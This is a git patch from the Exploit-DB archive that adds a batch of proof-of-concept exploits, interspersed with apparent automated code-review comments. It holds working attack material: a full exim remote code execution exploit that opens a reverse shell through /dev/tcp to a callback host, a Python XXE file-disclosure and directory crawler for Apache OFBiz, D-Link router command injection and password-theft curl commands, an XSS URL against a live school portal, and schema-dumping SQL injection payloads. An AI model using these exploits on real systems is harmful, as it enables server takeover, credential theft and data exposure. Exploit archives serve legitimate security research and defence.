From dac8dd47314d9716439cd572a606f0220a32c4b0 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Thu, 25 Oct 2018 05:01:46 +0000 Subject: [PATCH] DB: 2018-10-25 15 changes to exploits/shellcodes Adult Filter 1.0 - Denial of Service (PoC) Microsoft Data Sharing - Local Privilege Escalation (PoC) Webmin 1.5 - Web Brute Force (CGI) exim 4.90 - Remote Code Execution School ERP Pro+Responsive 1.0 - 'fid' SQL Injection SIM-PKH 2.4.1 - 'id' SQL Injection MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection School ERP Pro+Responsive 1.0 - 'fid' SQL Injection SIM-PKH 2.4.1 - 'id' SQL Injection MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection SG ERP 1.0 - 'info' SQL Injection Fifa Master XLS 2.3.2 - 'usw' SQL Injection Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting Apache OFBiz 16.11.04 - XML External Entity Injection D-Link Routers - Command Injection D-Link Routers - Plaintext Password D-Link Routers - Directory Traversal Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes --- exploits/aspx/webapps/45668.txt | 13 + exploits/hardware/webapps/45676.md | 23 + exploits/hardware/webapps/45677.md | 24 + exploits/hardware/webapps/45678.md | 27 + exploits/java/webapps/45673.py | 125 ++++ exploits/linux/remote/45671.py | 605 +++++++++++++++++++ exploits/multiple/remote/{745.cgi => 745.pl} | 0 exploits/php/webapps/45666.txt | 89 +++ exploits/php/webapps/45667.txt | 61 ++ exploits/php/webapps/45672.txt | 48 ++ exploits/windows/local/45675.md | 17 + exploits/windows_x86/dos/45670.txt | 27 + files_exploits.csv | 19 +- files_shellcodes.csv | 1 + shellcodes/linux_x86/45669.c | 52 ++ 15 files changed, 1127 insertions(+), 4 deletions(-) create mode 100644 exploits/aspx/webapps/45668.txt create mode 100644 exploits/hardware/webapps/45676.md create mode 100644 exploits/hardware/webapps/45677.md create mode 100644 exploits/hardware/webapps/45678.md create mode 100755 exploits/java/webapps/45673.py create mode 100755 
exploits/linux/remote/45671.py rename exploits/multiple/remote/{745.cgi => 745.pl} (100%) mode change 100644 => 100755 create mode 100644 exploits/php/webapps/45666.txt create mode 100644 exploits/php/webapps/45667.txt create mode 100644 exploits/php/webapps/45672.txt create mode 100644 exploits/windows/local/45675.md create mode 100644 exploits/windows_x86/dos/45670.txt create mode 100644 shellcodes/linux_x86/45669.c diff --git a/exploits/aspx/webapps/45668.txt b/exploits/aspx/webapps/45668.txt new file mode 100644 index 000000000..ece6317c9 --- /dev/null +++ b/exploits/aspx/webapps/45668.txt @@ -0,0 +1,13 @@ +# Exploit Title: Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting +# Dork: n/a +# Date: 2018-10-11 +# Exploit Author: Dino Barlattani +# Vendor Homepage: http://axiositalia.it/ +# Software Link: http://axiositalia.it/?page_id=1907 +# Version: 1.7.0/7.0.0 +# Category: Webapps +# Platform: ASPX +# CVE: N/A + +# POC: +# https://family.axioscloud.it/secret/relogoff.aspx?Error_Desc=Sessione%20non%20Validaa%3Cbody%20onload=%22alert(%27ok%27);%22%3E&Error_Parameters= \ No newline at end of file diff --git a/exploits/hardware/webapps/45676.md b/exploits/hardware/webapps/45676.md new file mode 100644 index 000000000..8359a647b --- /dev/null +++ b/exploits/hardware/webapps/45676.md 
@@ -0,0 +1,23 @@ +## Shell command injection +CVE: CVE-2018-10823 + +CVSS v3: 9.1 +AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H + +Description: An issue was discovered on D-Link routers: + +DWR-116 through 1.06, +DWR-512 through 2.02, +DWR-712 through 2.02, +DWR-912 through 2.02, +DWR-921 through 2.02, +DWR-111 through 1.01, +and probably others with the same type of firmware. +An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals. + +PoC: + +Login to the router. +Request the following URL after login: +`$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd` +See the passwd file contents in the response. \ No newline at end of file diff --git a/exploits/hardware/webapps/45677.md b/exploits/hardware/webapps/45677.md new file mode 100644 index 000000000..850b3128c --- /dev/null +++ b/exploits/hardware/webapps/45677.md 
@@ -0,0 +1,24 @@ +## Password stored in plaintext +CVE: CVE-2018-10824 + +Description: + +An issue was discovered on D-Link routers: + +DWR-116 through 1.06, +DIR-140L through 1.02, +DIR-640L through 1.02, +DWR-512 through 2.02, +DWR-712 through 2.02, +DWR-912 through 2.02, +DWR-921 through 2.02, +DWR-111 through 1.01, +and probably others with the same type of firmware. +NOTE: I have changed the filename in description to XXX because the vendor leaves some EOL routers unpatched and the attack is too simple + +The administrative password is stored in plaintext in the /tmp/XXX/0 file. An attacker having a directory traversal (or LFI) can easily get full router access. + +PoC using the directory traversal vulnerability disclosed above - CVE-2018-10822 + +`$ curl http://routerip/uir//tmp/XXX/0` +This command returns a binary config file which contains admin username and password as well as many other router configuration settings. By using the directory traversal vulnerability it is possible to read the file without authentication. \ No newline at end of file diff --git a/exploits/hardware/webapps/45678.md b/exploits/hardware/webapps/45678.md new file mode 100644 index 000000000..893abdc59 --- /dev/null +++ b/exploits/hardware/webapps/45678.md 
@@ -0,0 +1,27 @@ +Directory Traversal +CVE: CVE-2018-10822 + +CVSS v3: 8.6 +AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + +Description: Directory traversal vulnerability in the web interface on D-Link routers: + +DWR-116 through 1.06, +DIR-140L through 1.02, +DIR-640L through 1.02, +DWR-512 through 2.02, +DWR-712 through 2.02, +DWR-912 through 2.02, +DWR-921 through 2.02, +DWR-111 through 1.01, +and probably others with the same type of firmware +allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. + +NOTE: this vulnerability exists because of an incorrect fix for CVE-2017-6190. + +PoC: + +`$ curl http://routerip/uir//etc/passwd` +The vulnerability can be used retrieve administrative password using the other disclosed vulnerability - CVE-2018-10824. + +This vulnerability was reported previously by Patryk Bogdan in CVE-2017-6190 but he reported it is fixed in certain release but unfortunately it is still present in even newer releases. The vulnerability is also present in other D-Link routers and can be exploited not only (as the original author stated) by double dot but also absolutely using double slash. \ No newline at end of file diff --git a/exploits/java/webapps/45673.py b/exploits/java/webapps/45673.py new file mode 100755 index 000000000..2673ad0cd --- /dev/null +++ b/exploits/java/webapps/45673.py 
@@ -0,0 +1,125 @@ +# Exploit Title: Apache OFBiz 16.11.04 - XML External Entity Injection +# Date: 2018-10-15 +# Exploit Author: Jamie Parfet +# Vendor Homepage: https://ofbiz.apache.org/ +# Software Link: https://archive.apache.org/dist/ofbiz/ +# Version: < 16.11.04 +# Tested on: Ubuntu 18.04.1 +# CVE: N/A + +#!/usr/bin/env python3 +# ***************************************************** +# Type: XML External Entity Injection (File disclosure) +# Target: Apache OFBiz < 16.11.04 +# Author: Jamie Parfet +# ***************************************************** +import sys +import os +import requests +import urllib3 +import re +import argparse + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +simple_payload = """]> +xXx +&disclose;xXx +""" + +if len(sys.argv) <= 1: + print('[*] Apache OFBiz < 16.11.04 XXE') + print('[*] Use "%s -h" to display help.' % (sys.argv[0])) + exit(0) + + +parser = argparse.ArgumentParser() +parser.add_argument("-u", + metavar="https://localhost:8443", + dest="url", + required=True, + help="Target URL (required)", + action='store') +parser.add_argument("-f", + metavar="/etc/passwd", + dest="file", + help="Target file", + action='store') +parser.add_argument("-c", + metavar="/home/", + dest="crawl", + help="Target directory to start crawling from", + action='store') +parser.add_argument("-o", + metavar="~/local/output/directory/", + dest="output_dir", + help="Local directory that remote file will be saved to", + action='store') +args = parser.parse_args() +url = args.url if args.url else None +target_file = args.file if args.file else None +crawl_dir = args.crawl if args.crawl else None +output_dir = args.output_dir if args.output_dir else None + + +def check_url(url): + if '://' not in url: + print('[-] ERROR: Please include protocol in URL, such as https://{}'.format(url)) + exit(0) + else: + return url + + +def request(url, payload): + response = requests.post(url + '/webtools/control/xmlrpc', data=payload, 
verify=False).text + parsed_response = re.sub(r'(.*xXx\n|xXx.*)', '', response) + return parsed_response + + +def crawl(crawl_dir): + payload = simple_payload.format(crawl_dir) + response = request(url, payload) + payload_404 = simple_payload.format(crawl_dir + "/xX404Xx") + response_404 = request(url, payload_404) + if 'No such file or directory' in response: + print("[-] ERROR - 404: {}".format(crawl_dir)) + elif 'Permission denied' in response or 'but is not accessible' in response: + print("[-] ERROR - Permission: {}".format(crawl_dir)) + elif 'Not a directory' in response_404: + print("[*] FILE: {}".format(crawl_dir)) + else: + print("[*] DIR: {}".format(crawl_dir)) + for f in response.splitlines(): + full_path = (crawl_dir + '/' + f) + crawl(full_path) + + +def main(url=url, target_file=target_file, crawl_dir=crawl_dir, output_dir=output_dir): + if url: + check_url(url) + if crawl_dir: + crawl(crawl_dir) + else: + payload = simple_payload.format(target_file) + if output_dir: + if os.path.isdir(output_dir): + result = request(url, payload) + remote_file_name = re.sub('/', '--', target_file) + output_file = (output_dir + '/' + remote_file_name[2:]) + file = open(output_file, 'w') + file.write(result) + file.close() + else: + print("[-] ERROR: {} is not a writeable directory".format(output_dir)) + else: + result = request(url, payload) + print(result) + + +if __name__ == '__main__': + try: + main() + except KeyboardInterrupt: + print('\nKeyboard interrupt detected.') + print('Exiting...') + exit(0) \ No newline at end of file diff --git a/exploits/linux/remote/45671.py b/exploits/linux/remote/45671.py new file mode 100755 index 000000000..a954ed385 --- /dev/null +++ b/exploits/linux/remote/45671.py 
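Review bot: The file is created with mode 100755, but `#!/usr/bin/env python3` is only the tenth line, after the `# Exploit Title` header block, so a shebang is not in effect and executing the file directly will not select Python; the interpreter line must be line 1 of the file. The same defect is in `exploits/linux/remote/45671.py`, also mode 100755, where `#!/usr/bin/python` sits on line 9 below its header comments. In `main`, the output file is opened with `file = open(output_file, 'w')` and closed by hand, so an exception from `file.write(result)` leaks the handle; `with open(output_file, 'w') as fh: fh.write(result)` is the idiomatic form. The return value of `check_url(url)` is also discarded, which is harmless since the function exits on failure, but reads as if a validated value were being used.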
@@ -0,0 +1,605 @@ +# Exploit Title: exim 4.90 - Remote Code Execution +# Date: 2018-10-24 +# Exploit Author: hackk.gr +# Vendor Homepage: exim.org +# Version: exim < 4.90 +# Tested on: debian exim 4.89, ubuntu exim 4.86_2 +# CVE : CVE-2018-6789 + +#!/usr/bin/python +#debian exim 4.89 +#ubuntu exim 4.86_2 +import time +import socket +import struct +import os +import os.path +import sys +import ssl +import random +from multiprocessing import Process, Queue + +s = None +f = None +test = True +rcpt_index_start = 0x120 +bufsize = 8200 + +def connect(host, port): + global s + global f + s = socket.create_connection((host,port)) + f = s.makefile("rw", bufsize=0) + +def p(v): + return struct.pack(" -1: + auth_plain_available = True + + if test: + if len(l) > 70: + sys.stdout.write(l[:70] + " ...\n") + sys.stdout.flush() + else: + print l.strip("\r").strip("\n") + + data = data + l + if data.find(delim) > -1: + return data + if l == "\n" or l == "": + return "" + return data + +def write(data): + f.write(data + "\n") +def ehlo(v): + write("EHLO " + v) + return readuntil('HELP') +def unrec(v): + write(v) + readuntil('command') +def auth_plain(v): + encode = v.encode('base64').replace('\n','').replace('=','') + write("AUTH PLAIN " + encode) + l = f.readline() + if test: + if l.find("not advert") > -1 or l.find("not supported")> -1: + raise Exception("NO AUTH PLAIN CONFIG") + print l +def auth_plain1(v): + encode = v.encode('base64').replace('\n','').replace('=','') + write("AUTH PLAIN " + encode) + l = f.readline() + if test: + if l.find("Incorrect") > -1: + raise Exception("WRONG DRIVER") + if l.find("not advert") > -1 or l.find("not supported")> -1: + raise Exception("NO AUTH PLAIN CONFIG") + print l +def auth_plain2(v,value): + encode = v.encode('base64').replace('\n','').replace('=','') + value = chr(value).encode('base64').replace('\n','').replace('=','') + write("AUTH PLAIN " + encode[:-1] + value) + l = f.readline() + if test: + if l.find("Incorrect") > -1: + raise 
Exception("WRONG DRIVER") + if l.find("not advert") > -1 or l.find("not supported")> -1: + raise Exception("NO AUTH PLAIN CONFIG") + print l +def one_byte_overwrite(): + v = "C" * bufsize + encode = v.encode('base64').replace('\n','').replace('=','') + encode = encode[:-1] + "PE" + write("AUTH PLAIN " + encode) + l = f.readline() + if test: + if l.find("Incorrect") > -1: + raise Exception("WRONG DRIVER") + if l.find("not advert") > -1 or l.find("not supported")> -1: + raise Exception("NO AUTH PLAIN CONFIG") + print l + +lookup_table = {0x00: [0,3], +0x01: [0,7], +0x02: [0,11], +0x03: [0,15], +0x04: [0,19], +0x05: [0,23], +0x06: [0,27], +0x07: [0,31], +0x08: [0,35], +0x09: [0,39], +0x0a: [0,43], +0x0b: [0,47], +0x0c: [0,51], +0x0d: [0,55], +0x0e: [0,59], +0x0f: [0,63], +0x10: [0,67], +0x11: [0,71], +0x12: [0,75], +0x13: [0,79], +0x14: [0,83], +0x15: [0,87], +0x16: [0,91], +0x17: [0,95], +0x18: [0,99], +0x19: [0,103], +0x1a: [0,107], +0x1b: [0,111], +0x1c: [0,115], +0x1d: [0,119], +0x1e: [0,123], +0x1f: [0,127], +0x20: [0,131], +0x21: [0,135], +0x22: [0,139], +0x23: [0,143], +0x24: [0,147], +0x25: [0,151], +0x26: [0,155], +0x27: [0,159], +0x28: [0,163], +0x29: [0,167], +0x2a: [0,171], +0x2b: [0,175], +0x2c: [0,179], +0x2d: [0,183], +0x2e: [0,187], +0x2f: [0,191], +0x30: [0,195], +0x31: [0,199], +0x32: [0,203], +0x33: [0,207], +0x34: [0,211], +0x35: [0,215], +0x36: [0,219], +0x37: [0,223], +0x38: [0,227], +0x39: [0,231], +0x3a: [0,235], +0x3b: [0,239], +0x3c: [0,243], +0x3d: [0,247], +0x3e: [0,251], +0x3f: [0,254], +0x40: [64,3], +0x41: [64,7], +0x42: [64,11], +0x43: [64,15], +0x44: [64,19], +0x45: [64,23], +0x46: [64,27], +0x47: [64,31], +0x48: [64,35], +0x49: [64,39], +0x4a: [64,43], +0x4b: [64,47], +0x4c: [64,51], +0x4d: [64,55], +0x4e: [64,59], +0x4f: [64,63], +0x50: [64,67], +0x51: [64,71], +0x52: [64,75], +0x53: [64,79], +0x54: [64,83], +0x55: [64,87], +0x56: [64,91], +0x57: [64,95], +0x58: [64,99], +0x59: [64,103], +0x5a: [64,107], +0x5b: [64,111], +0x5c: 
[64,115], +0x5d: [64,119], +0x5e: [64,123], +0x5f: [64,127], +0x60: [64,131], +0x61: [64,135], +0x62: [64,139], +0x63: [64,143], +0x64: [64,147], +0x65: [64,151], +0x66: [64,155], +0x67: [64,159], +0x68: [64,163], +0x69: [64,167], +0x6a: [64,171], +0x6b: [64,175], +0x6c: [64,179], +0x6d: [64,183], +0x6e: [64,187], +0x6f: [64,191], +0x70: [64,195], +0x71: [64,199], +0x72: [64,203], +0x73: [64,207], +0x74: [64,211], +0x75: [64,215], +0x76: [64,219], +0x77: [64,223], +0x78: [64,227], +0x79: [64,231], +0x7a: [64,235], +0x7b: [64,239], +0x7c: [64,243], +0x7d: [64,247], +0x7e: [64,251], +0x7f: [64,254], +0x80: [128,3], +0x81: [128,7], +0x82: [128,11], +0x83: [128,15], +0x84: [128,19], +0x85: [128,23], +0x86: [128,27], +0x87: [128,31], +0x88: [128,35], +0x89: [128,39], +0x8a: [128,43], +0x8b: [128,47], +0x8c: [128,51], +0x8d: [128,55], +0x8e: [128,59], +0x8f: [128,63], +0x90: [128,67], +0x91: [128,71], +0x92: [128,75], +0x93: [128,79], +0x94: [128,83], +0x95: [128,87], +0x96: [128,91], +0x97: [128,95], +0x98: [128,99], +0x99: [128,103], +0x9a: [128,107], +0x9b: [128,111], +0x9c: [128,115], +0x9d: [128,119], +0x9e: [128,123], +0x9f: [128,127], +0xa0: [128,131], +0xa1: [128,135], +0xa2: [128,139], +0xa3: [128,143], +0xa4: [128,147], +0xa5: [128,151], +0xa6: [128,155], +0xa7: [128,159], +0xa8: [128,163], +0xa9: [128,167], +0xaa: [128,171], +0xab: [128,175], +0xac: [128,179], +0xad: [128,183], +0xae: [128,187], +0xaf: [128,191], +0xb0: [128,195], +0xb1: [128,199], +0xb2: [128,203], +0xb3: [128,207], +0xb4: [128,211], +0xb5: [128,215], +0xb6: [128,219], +0xb7: [128,223], +0xb8: [128,227], +0xb9: [128,231], +0xba: [128,235], +0xbb: [128,239], +0xbc: [128,243], +0xbd: [128,247], +0xbe: [128,251], +0xbf: [128,254], +0xc0: [192,3], +0xc1: [192,7], +0xc2: [192,11], +0xc3: [192,15], +0xc4: [192,19], +0xc5: [192,23], +0xc6: [192,27], +0xc7: [192,31], +0xc8: [192,35], +0xc9: [192,39], +0xca: [192,43], +0xcb: [192,47], +0xcc: [192,51], +0xcd: [192,55], +0xce: [192,59], +0xcf: [192,63], 
+0xd0: [192,67], +0xd1: [192,71], +0xd2: [192,75], +0xd3: [192,79], +0xd4: [192,83], +0xd5: [192,87], +0xd6: [192,91], +0xd7: [192,95], +0xd8: [192,99], +0xd9: [192,103], +0xda: [192,107], +0xdb: [192,111], +0xdc: [192,115], +0xdd: [192,119], +0xde: [192,123], +0xdf: [192,127], +0xe0: [192,131], +0xe1: [192,135], +0xe2: [192,139], +0xe3: [192,143], +0xe4: [192,147], +0xe5: [192,151], +0xe6: [192,155], +0xe7: [192,159], +0xe8: [192,163], +0xe9: [192,167], +0xea: [192,171], +0xeb: [192,175], +0xec: [192,179], +0xed: [192,183], +0xee: [192,187], +0xef: [192,191], +0xf0: [192,195], +0xf1: [192,199], +0xf2: [192,203], +0xf3: [192,207], +0xf4: [192,211], +0xf5: [192,215], +0xf6: [192,219], +0xf7: [192,223], +0xf8: [192,227], +0xf9: [192,231], +0xfa: [192,235], +0xfb: [192,239], +0xfc: [192,243], +0xfd: [192,247], +0xfe: [192,251], +0xff: [192,254], +} + +def exploit(b1, b2, b3, rcpt_index, target, cb, cbport): + global s + global f + + #if c % 0x50 == 0: + # print " byte1=0x%02x byte2=0x%02x byte3=0x%02x rcpt_index=0x%02x" % (b1, b2, b3, rcpt_index) + + try: + connect(target, 25) + except: + raise Exception("CONNECTION ERROR") + + banner = f.readline() + if test: + print banner.strip("\r").strip("\n") + + ehlo("A" * 8000) + + ehlo("B" * 16) + + unrec("\xff" * 2000) + ehlo("D" * bufsize) + one_byte_overwrite() + + fake_header = p(0) + fake_header += p(0x1f51) + res = auth_plain1("E" * 176 + fake_header + "E" * (bufsize-176-len(fake_header))) + + res = ehlo("F" * 16) + if res == "": + raise Exception("CRASHED") + + unrec("\xff" * 2000) + unrec("\xff" * 2000) + + fake_header = p(0x4110) + fake_header += p(0x1f50) + auth_plain("G" * 176 + fake_header + "G" * (bufsize-176-len(fake_header))) + + auth_plain2('A'* (bufsize) + p(0x2021) + chr(b1) + chr(b2) + chr(lookup_table[b3][0]), lookup_table[b3][1]) + res = ehlo("I" * 16) + + if res == "": + s.close() + f.close() + raise Exception("EHLO(I)") + + acl_smtp_rcpt_offset = rcpt_index + local_host = cb + local_port = cbport + cmd 
= "/usr/bin/setsid /bin/bash -c \"/bin/bash --rcfile <(echo 'echo " + "0x%02x " % b1 + "0x%02x " % b2 + "0x%02x " % b3 + "0x%04x " % rcpt_index + "') -i >& /dev/tcp/" + local_host + "/" + str(local_port) + " 0>&1\"" + cmd_expansion_string = "${run{" + cmd + "}}\0" + + auth_plain("J" * acl_smtp_rcpt_offset + cmd_expansion_string + "\x00")# * (bufsize - acl_smtp_rcpt_offset - len(cmd_expansion_string))) + + write("MAIL FROM:") + + res = f.readline() + + if res != "": + if test: + raise Exception("NO TARGET") + raise Exception("OFFSET") + + raise Exception("BYTE") + + write("RCPT TO:") + readuntil("Accepted") + + write("RCPT TO:") + if f.readline() == "": + s.close() + f.close() + raise Exception("RCPT TO") + +def checkvuln(host): + try: + exploit(0xff, 0xff, 0xff, rcpt_index_start, host, "127.0.0.1", "1337") + except Exception as e: + print e + if str(e) == "EHLO(I)": + return True + return False + +def _exploit(b1, b2, b3, rcpt_index, target, cb, cbport, q): + if b1 > 0xff or b2 > 0xff or b3 > 0xff: + q.put([b1,b2,b3,"VALUE"]) + return + try: + exploit(b1, b2, b3, rcpt_index, target, cb, cbport) + except Exception as e: + e = str(e) + if e == "[Errno 104] Connection reset by peer" or e.find("EOF occurred") > -1: + e = "BYTE" + q.put([b1,b2,b3,e]) + +if __name__ == '__main__': + if len(sys.argv) < 4: + print "%s " % sys.argv[0] + sys.exit(1) + + target = sys.argv[3] + cb = sys.argv[1] + cbport = sys.argv[2] + + if len(sys.argv) == 8: + print "reuse fixed offsets" + b1 = int(sys.argv[4], 16) + b2 = int(sys.argv[5], 16) + b3 = int(sys.argv[6], 16) + rcpt_index = int(sys.argv[7], 16) + + try: + exploit(b1, b2, b3, rcpt_index, target, cb, cbport) + except Exception as e: + print e + sys.exit(1) + + print "check vuln" + if not checkvuln(target): + print "false" + sys.exit(1) + + print "true" + test=False + + allbytes = [offset for offset in xrange(0, 0x110)] + allbytes_10 = [offset for offset in xrange(0x10, 0x110, 0x10)] + b3_survived = [] + + b3_survived_stop = False + 
tested = [] + try: + q = Queue() + procs = [] + print + print "Discover first byte in offset" + print + sys.stdout.write("Try Offsets %02x%02x%02x to %02x%02x%02x ..." % (0x00,0xff,0xff,0xff,0xff,0xff)) + for b3 in allbytes: + if b3 % 0x10 == 0 and b3 <= 0xff: + sys.stdout.write("\rTry Offsets %02x%02x%02x to %02x%02x%02x ..." % (b3,0xff,0xff,0xff,0xff,0xff)) + + b1 = 0x00 + + for b2 in allbytes_10: + proc = Process(target=_exploit, args=(b1, b2, b3, rcpt_index_start, target, cb, cbport, q)) + procs.append(proc) + proc.daemon = True + proc.start() + + to_break = False + if len(procs) == 16: + for i in xrange(0,16): + result = q.get() + if result[3] == "BYTE": + if [b3, b2] not in tested: + tested.append([b3, b2]) + b3_survived.append(result[2]) + sys.stdout.write("\nOffset %02x%02x%02x Survived ..." % (result[2],result[1],result[0])) + else: + to_break = True + + procs[:] = [] + if to_break: + break + + print "\n" + print "Discover offsets for rcpt index brute force ..." + print + b1_survived = {} + for b3 in b3_survived: + for b2 in allbytes: + if b2 % 0x10 == 0 and b2 <= 0xff: + sys.stdout.write("\r\r\nTry Offsets %02x%02x%02x to %02x%02x%02x ... " % (b3,b2,0x00,b3,0xff,0xf0)) + for b1 in allbytes_10: + proc = Process(target=_exploit, args=(b1, b2, b3, rcpt_index_start, target, cb, cbport, q)) + procs.append(proc) + proc.daemon = True + proc.start() + + if len(procs) == 16: + for i in xrange(0,16): + result = q.get() + if result[3] == "OFFSET": + if result[2] not in b1_survived: + b1_survived[result[2]] = [] + b1_survived[result[2]].append(result) + sys.stdout.write("\n%02x%02x%02x Survived ..." 
% (result[2],result[1],result[0])) + + procs[:] = [] + + iteration_list = [n for n in xrange(0x100,0x1000,0x10)] + iteration_list2 = [n for n in xrange(0x1000,0x3000,0x100)] + + for n in iteration_list2: + iteration_list.append(n) + + b1_survived_priority = [] + b1_survived_additional = [] + + for key in sorted(b1_survived): + if len(b1_survived[key]) < 7: + b1_survived_priority.append(b1_survived[key]) + else: + b1_survived_additional.append(b1_survived[key]) + + _b1_survived = [] + for result in b1_survived_priority: + _b1_survived.append(result) + for result in b1_survived_additional: + _b1_survived.append(result) + + print "\n" + print "Start rcpt index brute force ..." + print + + for result in _b1_survived: + for s in result: + sys.stdout.write("\rTry Offset %02x%02x%02x with rcpt index from 0x100 to 0x3000 ..." % (s[2],s[1],s[0])) + for rcpt_index in iteration_list: + proc = Process(target=_exploit, args=(s[0], s[1], s[2], rcpt_index, target, cb, cbport, q)) + procs.append(proc) + proc.daemon = True + proc.start() + + if len(procs) == 16: + for i in xrange(0,16): + q.get() + + procs[:] = [] + except KeyboardInterrupt: + pass + + print "done." \ No newline at end of file diff --git a/exploits/multiple/remote/745.cgi b/exploits/multiple/remote/745.pl old mode 100644 new mode 100755 similarity index 100% rename from exploits/multiple/remote/745.cgi rename to exploits/multiple/remote/745.pl diff --git a/exploits/php/webapps/45666.txt b/exploits/php/webapps/45666.txt new file mode 100644 index 000000000..7830d6a94 --- /dev/null +++ b/exploits/php/webapps/45666.txt 
@@ -0,0 +1,89 @@ +# Exploit Title: SG ERP 1.0 - 'info' SQL Injection +# Dork: N/A +# Date: 2018-10-24 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://fankstribe.org/ +# Software Link: https://sourceforge.net/projects/sgerp/files/latest/download +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/valida_login.php +# +# [PATH]/valida_login.php +# +# 05 $login = @$_POST['login']; +# 06 $senha = @$_POST['senha']; + +# POST /[PATH]/valida_login.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=dvctab6luqcp739fom5asvqru7 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 19 +login='='&senha='=' +HTTP/1.1 200 OK +Date: Wed, 24 Oct 2018 15:43:47 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 46 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + + +# http://localhost/[PATH]/index.php +GET /ExploitDb/GP%20ERP/index.php HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/[PATH]/valida_login.php +Cookie: PHPSESSID=dvctab6luqcp739fom5asvqru7 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Wed, 24 Oct 2018 15:43:47 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, 
must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 1950 +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/index.php?mod=est&bot=tes3&info=[SQL] + +GET /[PATH]/index.php?mod=est&bot=tes3&info=-4++uniOn++selecT+0x496873616e%2c0x496873616e%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e-- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=dvctab6luqcp739fom5asvqru7 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Wed, 24 Oct 2018 15:50:17 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45667.txt b/exploits/php/webapps/45667.txt new file mode 100644 index 000000000..e4fbcf119 --- /dev/null 
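Review bot: The second request in the PoC (`GET /ExploitDb/GP%20ERP/index.php HTTP/1.1` with `Host: 192.168.1.27`) uses the author's local test path and host, while every other request in the file uses the `[PATH]` and `TARGET` placeholders; for consistency it should read `GET /[PATH]/index.php HTTP/1.1` and `Host: TARGET`. The directory name "GP ERP" in that path also does not match the "SG ERP" product named in the title, which makes the listing harder to follow.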
+++ b/exploits/php/webapps/45667.txt 
